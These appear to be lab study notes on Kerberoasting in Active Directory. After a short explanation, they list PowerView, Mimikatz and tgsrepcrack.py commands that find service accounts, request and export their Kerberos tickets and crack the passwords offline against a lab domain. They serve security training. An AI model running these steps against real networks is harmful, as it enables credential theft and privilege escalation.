Priv Esc - Kerberoast

• Offline cracking of service account passwords.

• The Kerberos session ticket (TGS) has a server portion which is encrypted with the password hash of service account. This makes it possible to request a ticket and do offline password attack.

• Service accounts are many times ignored (passwords are rarely changed) and have privileged access.

• Password hashes of service accounts could be used to create Silver tickets.

Import-Module powerview.ps1

#Find User Accounts used as Service Accounts
Get-NetUser -SPN

#We are going after svcadmin MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local PrincipalName
Request-SPNTicket MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local

#Export All tickets
import-module ..\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::list /export"'
ls

#Crack the Service account password located in the C:\AD\Tools\kerberoast
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt 2-40a10000-student529@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi


#Import AD Module
Import-Module .\ADModule-master\ADModule-master\Microsoft.ActiveDirectory.Management.d
Import-Module .\ADModule-master\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

#Request a TGS
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"

Get-NetUser -SPN and Resuest-SPNTicket

python.exe .\tgsrepcrack.py .\10k-worst-pass.txt 2-40a10000-student529@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi